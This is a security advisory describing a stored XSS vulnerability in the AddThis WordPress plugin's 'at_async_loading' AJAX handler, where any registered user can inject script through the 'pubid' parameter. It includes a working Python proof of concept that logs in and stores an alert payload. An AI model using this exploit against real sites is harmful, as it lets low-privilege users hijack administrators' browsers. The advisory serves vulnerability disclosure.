Smart Website Tools by AddThis 4.0.6-5.0.2 – Stored XSS

Description

The Smart Website Tools by AddThis plugin exposes an AJAX function called 'at_async_loading' in 'addthis/addthis-for-wordpress.php'.

Access to this function is restricted to Registered users, however is not restricted to Administrative users, meaning that anyone with an account on the target site can access this function.

Neither is the input into the 'pubid' parameter sanitized, meaning that arbitrary HTML or JavaScript code can be inserted. This code is then executed when a user visits the Settings page for this plugin (wp-admin/options-general.php?page=addthis_social_widget).

Proof of Concept

When executed, the following PoC will override the ‘pubid’ option with a malicious payload, which will allow execution of arbitrary JavaScript if a user visits the options page for the plugin (wp-admin/options-general.php?page=addthis_social_widget).

import requests
s = requests.session()
target = 'http://localhost'

url = '%s/wp-login.php'%target
payload = {
        "log":"test",
        "pwd":"test",
        "wp-submit":"Log+In"
}
r = s.post(url, data=payload)

url = '%s/wp-admin/admin-ajax.php'%target
payload = {
        "action":"at_async_loading",
        "async_loading":1,
        "pubid":"'><script>alert(1)</script '"
}
r = s.post(url, data=payload)